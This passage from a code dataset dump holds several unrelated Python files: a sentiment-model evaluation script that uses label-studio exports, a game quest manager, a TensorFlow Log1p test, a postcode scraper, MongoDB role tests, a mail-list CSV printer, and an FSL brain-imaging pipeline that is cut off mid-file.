print(f\"Sending request to {url}, number of samples: {len(post_data)}\")\n    res = requests.post(url, data=json.dumps(data), headers=headers)\n    result = res.json()\n    myresults = []\n    for r in result['result']:\n        keyword_list = list(r.keys())\n        pres_list = list(r.values())\n        assert len(keyword_list) == 1\n        assert len(pres_list) == 1\n        keyword = keyword_list[0]\n        pres = pres_list[0]\n        for k,v in pres.items():\n            if v == 1:\n                # the API returns Chinese sentiment labels; they are data values and must stay as-is\n                if k == \"负向\":\n                    predict = \"消极\"\n                elif k == \"正向\":\n                    predict = \"积极\"\n                else:\n                    predict = \"中性\"\n                myresults.append([keyword,predict])\n    assert len(post_data) == len(myresults)\n\n    # Save to file\n    newdata = []\n    for d, res in zip(mydata, myresults):\n        if res[0] != d[\"keyword\"]:\n            print(f\"Keyword returned by the prediction does not match: {res[0]}\")\n            continue\n        d[\"online_predict\"] = res[1]\n        newdata.append(d)\n    df = pd.DataFrame(newdata)\n    excel_file = \"result_online.xlsx\"\n    writer = pd.ExcelWriter(excel_file, engine='xlsxwriter')\n    df.to_excel(writer)\n    writer.save()\n    print(f\"Saved to excel successfully: {excel_file}\")\n    return newdata\n\ndef read_result_online():\n    \"\"\"\n    Read result_online.xlsx and compare the character-count split of\n    preceding text, keyword, and following text:\n    pretext + keyword + posttext\n    predict holds the result using 75 characters, split 25+25+25\n    online_predict holds the result using 15+30+20\n    :return:\n    \"\"\"\n    df = pd.read_excel(\"result_online.xlsx\")\n    total = 0\n\n    predict_yes = 0\n    online_yes = 0\n    for index, row in df.iterrows():\n        label = row['label']\n        predict = row['predict']\n        online_predict = row['online_predict']\n        if predict != online_predict:\n            total += 1\n            if predict == label:\n                predict_yes +=1\n            elif online_predict == label:\n                online_yes +=1\n            else:\n                print(\"Neither prediction is correct\")\n                print(row)\n                print()\n    print(f\"{total} samples differ in total; the 75-character prediction got {predict_yes} right, the online 65-character prediction got {online_yes} right\")\n\ndef dopredict(test_data, url=\"http://127.0.0.1:5000/api/predict_macbert\", type=None):\n    \"\"\"\n    Predict the results\n    :param test_data:\n    :return:\n    \"\"\"\n    if type:\n        data = {'data': test_data, 'type':type}\n    else:\n        data = {'data': test_data}\n    headers = {'content-type': 'application/json'}\n    r = requests.post(url, headers=headers, data=json.dumps(data), timeout=360)\n    result = r.json()\n    return result\n\ndef download_data_and_compare(hostname=[\"http://192.168.50.139:8081/api/\"], dirpath=\"/opt/lavector/absa/\", jsonfile=[\"192.168.50.139_500_8081_0129.json\"], isabsa=True, result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\", type=None):\n    \"\"\"\n    Download data from a label_studio hostname, then predict, and finally report the results\n    :return:\n    \"\"\"\n    from absa_api import export_data\n    # Download files from label-studio\n    original_data = []\n    for hname, jfile in zip(hostname,jsonfile):\n        json_file = export_data(hostname=hname, dirpath=dirpath, jsonfile=jfile, proxy=False)\n        # Load the json file fetched from label-studio\n        with open(json_file, 'r') as f:\n            data = json.load(f)\n        print(f\"Collected {len(data)} records from host {hname}\")\n        original_data.extend(data)\n    data = predict_comare_excel(original_data, result_excel=result_excel, export_wrong_examples_excel=export_wrong_examples_excel,correct_examples_excel= correct_examples_excel, isabsa=isabsa, type=type)\n    return data\n\ndef download_data_and_compare_same(hostname=[\"http://192.168.50.139:8081/api/\",\"http://192.168.50.139:8080/api/\"], dirpath=\"/opt/lavector/absa/\", jsonfile=[\"192.168.50.139_500_8081_0129.json\",\"192.168.50.139_500_8080_0129.json\"], isabsa=True):\n    \"\"\"\n    Compare the same evaluation data hosted on two hostnames\n    Download the data from each label_studio hostname, then predict, and finally report the results\n    :return:\n    \"\"\"\n    from absa_api import export_data\n    # Download files from label-studio\n    if len(hostname) != 2:\n        raise Exception(\"Exactly 2 hostnames containing the same evaluation data are required\")\n    result = []\n    for hname, jfile in zip(hostname,jsonfile):\n        original_data = []\n        json_file = export_data(hostname=hname, dirpath=dirpath, jsonfile=jfile, proxy=False)\n        # Load the json file fetched from label-studio\n        with open(json_file, 'r') as f:\n            data = json.load(f)\n        print(f\"Collected {len(data)} records from host {hname}\")\n        original_data.extend(data)\n        predict_data, excel_data = predict_comare_excel(original_data, isabsa=isabsa)\n        result.append([hname, predict_data, excel_data])\n    # Compare the data annotated by the two annotators\n    diffrent_data = []\n    print(f\"Comparing hosts {result[0][0], result[1][0]}\")\n    hname1, data1, pre1 = result[0]\n    hname2, data2, pre2 = result[1]\n    if len(data1) != len(data2):\n        raise Exception(\"The two annotators' data totals do not match\")\n    for d1, d2 in zip(data1,data2):\n        if d1[0] != d2[0]:\n            print(\"This record does not match\")\n        else:\n            if d1[4] != d2[4]:\n                print(\"The two annotators' labels do not match\")\n                print(d1[0])\n                print(d1[1])\n                print(d1[4])\n                print(d2[4])\n                one_data = {\"text\": d1[0], \"keyword\": d1[1], \"P1_label\": d1[4], \"P2_label\": d2[4], \"location\": d1[2:4]}\n                diffrent_data.append(one_data)\n    print(f\"Total number of mismatched records: {len(diffrent_data)}\")\n    df = pd.DataFrame(diffrent_data)\n    writer = pd.ExcelWriter(\"diffrent.xlsx\", engine='xlsxwriter')\n    df.to_excel(writer)\n    writer.save()\n    print(\"Saved to diffrent.xlsx successfully\")\n    return data\n\ndef predict_comare_excel(original_data,result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\", isabsa=True, type=None):\n    \"\"\"\n    :param original_data:\n    :param result_excel:\n    :param export_wrong_examples_excel:\n    :param correct_examples_excel:\n    :param isabsa:\n    :return: data is the preprocessed data, excel_data is the model prediction result\n    \"\"\"\n    from convert_label_studio_data import format_data, do_truncate_data\n    # [(text, keyword, start_idx, end_idx, label)]\n    data = format_data(original_data)\n    # original_data,truncate_data, locations = do_truncate_data(data)\n    if isabsa:\n        predict_result = dopredict(test_data=data, url=\"http://192.168.50.189:5000/api/predict_macbert\")\n    else:\n        assert type is not None, \"type must be given, e.g. component, efficacy, fragrance, etc.\"\n        predict_result = dopredict(test_data=data, url=\"http://192.168.50.189:5015/api/predict_truncate\",type=type)\n    # print(predict_result)\n    excel_data = []\n    for d, pred in zip(data, predict_result):\n        one_data = {\"text\": d[0], \"keyword\": d[1], \"label\": d[4], \"predict\": pred[0], \"start\": d[2], \"end\":d[3],\n                    \"probability\": format(pred[1], \"0.3f\"), \"channel\":d[-2], \"wordtype\":d[-1]}\n        excel_data.append(one_data)\n    df = pd.DataFrame(excel_data)\n    writer = pd.ExcelWriter(result_excel, engine='xlsxwriter')\n    df.to_excel(writer)\n    writer.save()\n    print(f\"Saved to excel successfully: {result_excel}\")\n\n    # Samples predicted incorrectly\n    predict_wrong_examples = []\n    # Save the incorrectly predicted samples to excel\n    correct_examples = []\n    for d, pred in zip(data, predict_result):\n        one_data = {\"text\": d[0], \"keyword\": d[1], \"label\": d[4], \"predict\": pred[0], \"start\": d[2], \"end\": d[3],\n                    \"probability\": format(pred[1], \"0.3f\"), \"channel\": d[-2], \"wordtype\": d[-1]}\n        if one_data[\"label\"] != one_data[\"predict\"]:\n            print(f\"{one_data['text']}: model prediction does not match the ground truth\")\n            predict_wrong_examples.append(one_data)\n        else:\n            correct_examples.append(one_data)\n    print(f\"Total samples: {len(data)}, total incorrectly predicted: {len(predict_wrong_examples)}\")\n    print(f\"Total samples: {len(data)}, total correctly predicted: {len(correct_examples)}\")\n\n    df = pd.DataFrame(predict_wrong_examples)\n    writer = pd.ExcelWriter(export_wrong_examples_excel, engine='xlsxwriter')\n    df.to_excel(writer, sheet_name='table1')\n    writer.save()\n    df = pd.DataFrame(correct_examples)\n    writer = pd.ExcelWriter(correct_examples_excel, engine='xlsxwriter')\n    df.to_excel(writer, sheet_name='table1')\n    writer.save()\n    print(f\"Finished saving all incorrect samples to excel: {export_wrong_examples_excel}\")\n    print(f\"Finished saving all correct samples to excel: {correct_examples_excel}\")\n    print(f\"Accuracy: {(len(correct_examples))/len(data)}\")\n    return data, excel_data\n\ndef get_json_data_compare(jsonfile=\"/opt/lavector/192.168.50.119_8086.json\"):\n    \"\"\"\n    Load the jsonfile, then predict\n    :return:\n    \"\"\"\n    # Load the json file fetched from label-studio (the original passed the file path straight to predict_comare_excel)\n    with open(jsonfile, 'r') as f:\n        original_data = json.load(f)\n    data = predict_comare_excel(original_data, result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\")\n    return data\n\ndef check_train_data(result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\", dev=True):\n    \"\"\"\n    Check which data was mispredicted when training and evaluating the model; defaults to dev_data\n    :return:\n    \"\"\"\n    train_data = \"data_root_dir/components\"\n    from convert_label_studio_data import get_all\n    # [(text, keyword, start_idx, end_idx, label)]\n    original_data, train_data, dev_data = get_all(absa=False, keep_cancel=False, split=True)\n    if dev:\n        # Evaluate the dev data\n        eval_data = dev_data\n    else:\n        eval_data = original_data\n    # predict_result = dopredict(test_data=original_data, url=\"http://127.0.0.1:5010/api/predict_truncate\")\n    predict_result = dopredict(test_data=eval_data, url=\"http://192.168.50.139:5010/api/predict_truncate\")\n    excel_data = []\n    for ori, d in zip(eval_data, predict_result):\n        one_data = {\"text\": ori[0], \"keyword\": ori[1], \"label\": ori[4], \"predict\": d[0], \"location\": d[3],\n                    \"probability\": format(d[1], \"0.3f\"), \"channel\": ori[-2], \"wordtype\": ori[-1]}\n        excel_data.append(one_data)\n    df = 
pd.DataFrame(excel_data)\n writer = pd.ExcelWriter(result_excel, engine='xlsxwriter')\n df.to_excel(writer)\n writer.save()\n print(f\"保存到excel成功{result_excel}\")\n\n # 预测错误的样本\n predict_wrong_examples = []\n # 保存预测错误的样本到excel中\n correct_examples = []\n for ori, d in zip(eval_data, predict_result):\n one_data = {\"text\": ori[0], \"keyword\": ori[1], \"label\": ori[4], \"predict\": d[0], \"location\": d[3],\n \"probability\": format(d[1], \"0.3f\"), \"channel\": ori[-2], \"wordtype\": ori[-1]}\n if one_data[\"label\"] != one_data[\"predict\"]:\n print(f\"{one_data['text']}: 模型预测的结果与ground truth不一致\")\n predict_wrong_examples.append(one_data)\n else:\n correct_examples.append(one_data)\n print(f\"总样本数是{len(eval_data)},预测错误的样本总数是{len(predict_wrong_examples)}\")\n print(f\"总样本数是{len(eval_data)},预测正确的样本总数是{len(correct_examples)}\")\n\n df = pd.DataFrame(predict_wrong_examples)\n writer = pd.ExcelWriter(export_wrong_examples_excel, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='table1')\n writer.save()\n df = pd.DataFrame(correct_examples)\n writer = pd.ExcelWriter(correct_examples_excel, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='table1')\n writer.save()\n print(f\"保存全部为错误的样本到excel: {export_wrong_examples_excel}完成\")\n print(f\"保存全部为正确的样本到excel: {correct_examples_excel}完成\")\n print(f\"准确率为{(len(correct_examples)) / len(eval_data)}\")\n return eval_data, excel_data\n\ndef eval4dems():\n \"\"\"\n 评估4个维度的结果\n :return:\n :rtype:\n \"\"\"\n hostnames = [\"http://192.168.50.139:7081/api/\",\"http://192.168.50.139:7082/api/\",\"http://192.168.50.139:7083/api/\",\"http://192.168.50.139:7084/api/\"]\n dirs = [\"/opt/lavector/effect/\",\"/opt/lavector/pack/\", \"/opt/lavector/fragrance/\", \"/opt/lavector/promotion/\"]\n save_files = [\"effect_200_0629.json\", \"pack_200_0629.json\", \"fragrance_200_0629.json\", \"promotion_200_0629.json\"]\n names = [\"effect\", \"pack\", \"fragrance\", \"promotion\"]\n for host,dir,savefile,name in zip(hostnames, dirs, save_files, names):\n download_data_and_compare(hostname=[host], dirpath=dir,\n jsonfile=[savefile], isabsa=False, result_excel=f\"{name}_result.xlsx\", export_wrong_examples_excel=f\"{name}_wrong.xlsx\",correct_examples_excel=f\"{name}_correct.xlsx\",type=name)\n\nif __name__ == '__main__':\n # collect_data()\n # compare_model()\n # read_result_online()\n # download_data_and_compare()\n # download_data_and_compare(hostname=[\"http://192.168.50.139:8086/api/\"], dirpath=\"/opt/lavector/components/\", jsonfile= [\"192.168.50.139_500_8086_0129.json\"],isabsa=False)\n # download_data_and_compare(hostname=[\"http://192.168.50.139:8081/api/\"], dirpath=\"/opt/lavector/absa/\", jsonfile= [\"192.168.50.139_500_8081_0220.json\"],isabsa=True)\n # get_json_data_compare()\n # download_data_and_compare_same()\n # check_train_data()\n eval4dems()","sub_path":"huazhuang/utils/compare_components.py","file_name":"compare_components.py","file_ext":"py","file_size_in_byte":15350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"245830718","text":"# Embedded file name: lib.coginvasion.quests.QuestManagerAI\nimport QuestGlobals, Quests\nfrom QuestManagerBase import QuestManagerBase\nfrom lib.coginvasion.hood import ZoneUtil\nfrom lib.coginvasion.globals import CIGlobals\nimport random\n\nclass QuestManagerAI(QuestManagerBase):\n\n def __init__(self, avatar):\n QuestManagerBase.__init__(self)\n self.avatar = avatar\n\n def cleanup(self):\n QuestManagerBase.cleanup(self)\n del self.avatar\n\n def 
getPickableQuestList(self, npc):\n        generator = random.Random()\n        generator.seed(npc.doId)\n        quests = []\n        possibleQuestIds = list(Quests.Quests.keys())\n        # iterate over copies below: calling remove() on the list being iterated skips elements\n        for questId in list(possibleQuestIds):\n            if Quests.Quests[questId]['tier'] != self.avatar.getTier():\n                possibleQuestIds.remove(questId)\n\n        for questId in self.avatar.getQuestHistory():\n            if questId in possibleQuestIds:\n                possibleQuestIds.remove(questId)\n\n        if len(possibleQuestIds) > 1:\n            for questId in list(possibleQuestIds):\n                if Quests.Quests[questId].get('lastQuestInTier', False) == True:\n                    possibleQuestIds.remove(questId)\n\n        if len(possibleQuestIds) > 3:\n            quests += generator.sample(possibleQuestIds, 3)\n        else:\n            quests = possibleQuestIds\n        return quests\n\n    def completedQuest(self, questId):\n        quest = self.quests.get(questId)\n        rewardValue = quest.rewardValue\n        if quest.rewardType == Quests.RewardHealth:\n            self.avatar.b_setMaxHealth(self.avatar.getMaxHealth() + rewardValue)\n            self.avatar.b_setHealth(self.avatar.getMaxHealth())\n            self.avatar.d_announceHealth(1, rewardValue)\n        elif quest.rewardType == Quests.RewardJellybeans:\n            self.avatar.b_setMoney(self.avatar.getMoney() + rewardValue)\n        self.removeEntireQuest(questId)\n\n    def isOnLastObjectiveOfQuest(self, questId):\n        quest = self.quests.get(questId)\n        return quest.currentObjectiveIndex >= quest.numObjectives - 1\n\n    def wasLastObjectiveToVisit(self, npcId, checkCurrentCompleted = False):\n        for quest in self.quests.values():\n            questId = quest.questId\n            currentObjectiveIndex = quest.currentObjectiveIndex\n            currentObjective = quest.getCurrentObjective()\n            lastObjectiveIndex = quest.currentObjectiveIndex - 1\n            if lastObjectiveIndex < 0:\n                continue\n            lastObjectiveData = Quests.Quests[questId]['objectives'][lastObjectiveIndex]\n            lastObjectiveType = lastObjectiveData[0]\n            if lastObjectiveType == Quests.VisitNPC:\n                if lastObjectiveData[2] == npcId:\n                    if not checkCurrentCompleted:\n                        return True\n                    if currentObjective.isComplete():\n                        return True\n            elif lastObjectiveType == Quests.VisitHQOfficer:\n                if CIGlobals.NPCToonDict[npcId][3] == CIGlobals.NPC_HQ:\n                    if not checkCurrentCompleted:\n                        return True\n                    if currentObjective.isComplete():\n                        return True\n\n        return False\n\n    def hasAnObjectiveToVisit(self, npcId, zoneId):\n        for quest in self.quests.values():\n            currObjective = quest.getCurrentObjective()\n            if currObjective.type == Quests.VisitNPC:\n                if currObjective.npcId == npcId:\n                    if currObjective.npcZone == zoneId:\n                        return True\n            elif currObjective.type == Quests.VisitHQOfficer:\n                if CIGlobals.NPCToonDict[npcId][3] == CIGlobals.NPC_HQ:\n                    return True\n\n        return False\n\n    def checkIfObjectiveIsComplete(self, questId):\n        quest = self.quests.get(questId)\n        if quest.currentObjective.isComplete():\n            self.incrementQuestObjective(questId)\n\n    def cogDefeated(self, cog):\n        for questId in self.quests.keys():\n            quest = self.quests[questId]\n            objective = quest.getCurrentObjective()\n            if objective.type in Quests.DefeatCogObjectives:\n                if not objective.isComplete():\n                    if objective.type == Quests.DefeatCog:\n                        if objective.subject == Quests.Any:\n                            if objective.area == Quests.Any or ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n                                self.incrementQuestObjectiveProgress(questId)\n                        elif objective.subject == cog.head:\n                            if objective.area == Quests.Any or ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n                                self.incrementQuestObjectiveProgress(questId)\n                    elif objective.type == Quests.DefeatCogLevel:\n                        if cog.getLevel() >= objective.minCogLevel:\n                            if objective.area == Quests.Any or 
ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n self.incrementQuestObjectiveProgress(questId)\n elif objective.type == Quests.DefeatCogDept:\n if objective.subject == cog.team:\n if objective.area == Quests.Any or ZoneUtil.getHoodId(objective.area, 1) == cog.getHood():\n self.incrementQuestObjectiveProgress(questId)\n self.checkIfObjectiveIsComplete(questId)\n\n def invasionDefeated(self, hood, size = None):\n for questId in self.quests.keys():\n quest = self.quests[questId]\n objective = quest.getCurrentObjective()\n if objective.type == Quests.DefeatCogInvasion:\n if not objective.isComplete():\n if ZoneUtil.getHoodId(objective.area, 1) == hood or objective.area == Quests.Any:\n self.incrementQuestObjectiveProgress(questId)\n self.checkIfObjectiveIsComplete(questId)\n\n def tournamentDefeated(self, hood):\n for questId in self.quests.keys():\n quest = self.quests[questId]\n objective = quest.getCurrentObjective()\n if objective.type == Quests.DefeatCogTournament:\n if not objective.isComplete():\n if ZoneUtil.getHoodId(objective.area, 1) == hood or objective.area == Quests.Any:\n self.incrementQuestObjectiveProgress(questId)\n self.checkIfObjectiveIsComplete(questId)\n\n def makeQuestsFromData(self):\n QuestManagerBase.makeQuestsFromData(self, self.avatar)\n\n def addNewQuest(self, questId):\n questHistory = list(self.avatar.getQuestHistory())\n questData = list(self.avatar.getQuests())\n questData[0].append(questId)\n questData[1].append(0)\n questData[2].append(0)\n questHistory.append(questId)\n self.avatar.b_setQuests(questData)\n self.avatar.b_setQuestHistory(questHistory)\n\n def removeEntireQuest(self, questId):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n for array in questData:\n del array[quest.index]\n\n self.avatar.b_setQuests(questData)\n\n def incrementQuestObjective(self, questId, increment = 1):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[1][quest.index] += increment\n questData[2][quest.index] = 0\n self.avatar.b_setQuests(questData)\n\n def updateQuestObjective(self, questId, value):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[1][quest.index] = value\n self.avatar.b_setQuests(questData)\n\n def incrementQuestObjectiveProgress(self, questId, increment = 1):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[2][quest.index] += increment\n self.avatar.b_setQuests(questData)\n\n def updateQuestObjectiveProgress(self, questId, value):\n quest = self.quests[questId]\n questData = list(self.avatar.getQuests())\n questData[2][quest.index] = value\n self.avatar.b_setQuests(questData)","sub_path":"lib/coginvasion/quests/QuestManagerAI.py","file_name":"QuestManagerAI.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161814740","text":"# Copyright (C) 2018-2023 Intel Corporation\n# SPDX-License-Identifier: Apache-2.0\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\nfrom common.tf_layer_test_class import CommonTFLayerTest\n\n\nclass TestLog1p(CommonTFLayerTest):\n def _prepare_input(self, inputs_info):\n assert 'x' in inputs_info\n x_shape = inputs_info['x']\n inputs_data = {}\n inputs_data['x'] = np.random.randint(-0.9, 5, x_shape).astype(np.float32)\n\n return inputs_data\n\n def create_log1p_net(self, x_shape):\n tf.compat.v1.reset_default_graph()\n # Create the graph and model\n with tf.compat.v1.Session() 
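A quick aside on the `getPickableQuestList` fix applied in `QuestManagerAI.py` above: the original filtered `possibleQuestIds` by calling `remove()` inside a loop over that same list. A tiny standalone demonstration of why that skips elements, and the iterate-over-a-copy idiom used in the fix:

```python
# Removing from a list while iterating it makes the iterator skip the
# element that slides into the freed slot.
quest_ids = [101, 101, 202, 303]   # imagine two consecutive wrong-tier quests

broken = list(quest_ids)
for qid in broken:
    if qid == 101:
        broken.remove(qid)
print(broken)   # [101, 202, 303] -- the second 101 survived

fixed = list(quest_ids)
for qid in list(fixed):   # iterate over a snapshot, mutate the original
    if qid == 101:
        fixed.remove(qid)
print(fixed)    # [202, 303]
```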
as sess:\n x = tf.compat.v1.placeholder(tf.float32, x_shape, 'x')\n tf.raw_ops.Log1p(x=x)\n tf.compat.v1.global_variables_initializer()\n tf_net = sess.graph_def\n\n return tf_net, None\n\n test_data_basic = [\n dict(x_shape=[]),\n dict(x_shape=[3]),\n dict(x_shape=[2, 1, 4]),\n ]\n\n @pytest.mark.parametrize(\"params\", test_data_basic)\n @pytest.mark.precommit_tf_fe\n @pytest.mark.nightly\n def test_log1p_basic(self, params, ie_device, precision, ir_version, temp_dir,\n use_new_frontend, use_old_api):\n self._test(*self.create_log1p_net(**params),\n ie_device, precision, ir_version, temp_dir=temp_dir,\n use_new_frontend=use_new_frontend, use_old_api=use_old_api)\n","sub_path":"tests/layer_tests/tensorflow_tests/test_tf_Log1p.py","file_name":"test_tf_Log1p.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"70714517","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2015 Agustin Prats\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
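For context on the `tf.raw_ops.Log1p` test above: the op computes log(1 + x), and the point of a dedicated op is numerical stability for small x. A short NumPy illustration of the difference (not part of the OpenVINO test itself):

```python
import numpy as np

x = np.array([-0.9, 0.0, 1e-8, 4.0], dtype=np.float32)
naive = np.log(1.0 + x)   # 1 + 1e-8 rounds to 1.0 in float32 -> log is 0
stable = np.log1p(x)      # keeps the ~1e-8 result for the tiny input
print(naive)
print(stable)
```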
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport logging\nimport re\n\nfrom bs4 import BeautifulSoup\n\nfrom http import HttpCache\n\n\nclass PostcodeScraper(object):\n\n def __init__(self, http_cache=HttpCache(), base_url='http://distritopostal.es'):\n self.base_url = base_url\n self.http_cache = http_cache\n\n def get_postcodes(self, province, city):\n results = []\n if self._validate(province, city):\n url = self.base_url + '/' + self._clean(province) + '/' + self._clean(city)\n html = self.http_cache.get(url)\n if html:\n soup = BeautifulSoup(html.encode('latin-1'), 'html.parser')\n\n # one postcode\n one_postcode_soup = soup.find('td', class_='cp center')\n if one_postcode_soup:\n results.append(one_postcode_soup.text)\n\n # multiple postcodes\n multiple_postcode_soup = soup.find_all('a', title=re.compile('C.digo postal \\d{5},.*'))\n if multiple_postcode_soup:\n for postcode_soup in multiple_postcode_soup:\n results.append(postcode_soup.text)\n\n return results\n\n @staticmethod\n def _validate(province, city):\n result = True\n if province is None:\n logging.error('Province parameter not specified')\n result = False\n if city is None:\n logging.error('City parameter not specified')\n result = False\n return result\n\n @staticmethod\n def _clean(parameter):\n return parameter.lower().strip().replace(' ', '-')","sub_path":"edenred_ranking/scrapers/postcode.py","file_name":"postcode.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468727577","text":"import os\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']\n).get_hosts('all')\n\n\ndef include_vars(host):\n if host.system_info.distribution == \"redhat\" \\\n or host.system_info.distribution == \"centos\":\n ansible = host.ansible('include_vars',\n 'file=\"../../vars/RedHat.yml\"',\n False,\n False)\n if host.system_info.distribution == \"debian\" \\\n or host.system_info.distribution == \"ubuntu\":\n ansible = host.ansible('include_vars',\n 'file=\"../../vars/Debian.yml\"',\n False,\n False)\n return ansible\n\n\ndef test_mongod_cnf_file(host):\n mongodb_user = include_vars(host)['ansible_facts']['mongodb_user']\n mongodb_group = include_vars(host)['ansible_facts']['mongodb_group']\n f = host.file('/etc/mongod.conf')\n\n assert f.exists\n assert f.user == mongodb_user\n assert f.group == mongodb_group\n\n\ndef test_mongod_service(host):\n mongod_service = include_vars(host)['ansible_facts']['mongod_service']\n s = host.service(mongod_service)\n\n assert s.is_running\n assert s.is_enabled\n\n\ndef test_mongod_port(host):\n try:\n port = include_vars(host)['ansible_facts']['mongod_port']\n except KeyError:\n port = 27017\n s = host.socket(\"tcp://0.0.0.0:{0}\".format(port))\n\n assert s.is_listening\n\n\ndef test_mongod_replicaset(host):\n '''\n Ensure that the MongoDB replicaset has been created successfully\n '''\n try:\n port = include_vars(host)['ansible_facts']['mongod_port']\n except KeyError:\n port = 27017\n cmd = \"mongo --port {0} --eval 'rs.status()'\".format(port)\n # We only want to run this once\n if host.ansible.get_variables()['inventory_hostname'] == \"ubuntu_16\":\n r = host.run(cmd)\n\n assert 
\"rs0\" in r.stdout\n assert \"ubuntu-16:{0}\".format(port) in r.stdout\n assert \"ubuntu-18:{0}\".format(port) in r.stdout\n assert \"debian-stretch:{0}\".format(port) in r.stdout\n assert \"debian-buster:{0}\".format(port) in r.stdout\n assert \"centos-7:{0}\".format(port) in r.stdout\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/mongodb/roles/mongodb_mongod/molecule/virtualbox/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496294652","text":"#!/usr/bin/env python3\nimport csv\nimport os\nMAIL_LIST = 'maillist'\nfor file in os.listdir(path=MAIL_LIST):\n with open(MAIL_LIST+'/'+file, 'r', encoding='utf8')as csvfile:\n rows = csv.reader(csvfile)\n for row in rows:\n org = row[3]\n name = row[2]\n if row[1]:\n mailto = row[1]\n else:\n mailto = row[0]\n print(mailto+','+name)\n","sub_path":"mailpre.py","file_name":"mailpre.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"103993604","text":"import subprocess\nimport os\nfrom time import localtime, strftime\nimport numpy as np\nimport shutil\nimport sys\n\ndef curr_time(format='logging'):\n if format == 'filename':\n return strftime(\"%y%m%d-%H%M%S\", localtime())\n elif format == 'logging':\n return strftime(\"%Y/%m/%d @ %H:%M:%S\", localtime())\n\n# load the directory of T1w raw images\nroot_dir = '/scr4/marco/workspace/data/BioMS/images/mri_raw/T1w/'\nref = '/usr/share/fsl/data/standard/MNI152_T1_1mm.nii.gz'\nfiles = np.sort(os.listdir(root_dir+'raw'))\nwith open('/scr4/marco/workspace/data/BioMS/logs/fsl_pipe-'+curr_time('filename')+'.log','w') as f:\n\tsys.stdout = f\n\tprint('FSL Pipeline Started @ ' + curr_time('logging'))\n\ttry:\n\t\tfor file in files:\n\t\t\tsubject, ext = os.path.splitext(os.path.splitext(file)[0])\n\t\t\tprint('Processing Subject: ' + subject)\n\t\t\tfor step in range(0,5):\n\t\t\t\tif step == 0:\n\t\t\t\t\tprint('... Reorienting to MNI')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"fslreorient2std\",root_dir+'raw/'+file,root_dir+'processed/'+subject+'_'+str(step)+'-reoriented.nii.gz')\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\n\t\t\t\telif step == 1:\n\t\t\t\t\tprint('... Standard Space ROI Prebet')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"standard_space_roi\",root_dir+'processed/'+subject+'_'+str(step-1)+'-reoriented.nii.gz',root_dir+'processed/'+subject+'_'+str(step)+'-ssrb.nii.gz','-b')\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\n\t\t\t\telif step == 2:\n\t\t\t\t\tprint('... Extracting Brain')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"bet\",root_dir+'processed/'+subject+'_'+str(step-1)+'-ssrb.nii.gz',root_dir+'processed/'+subject+'_'+str(step)+'-bet.nii.gz','-f','0.1')\n\t\t\t\t\tprint(args)\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\t\t\t\n\t\t\t\telif step == 3:\n\t\t\t\t\tprint('... 
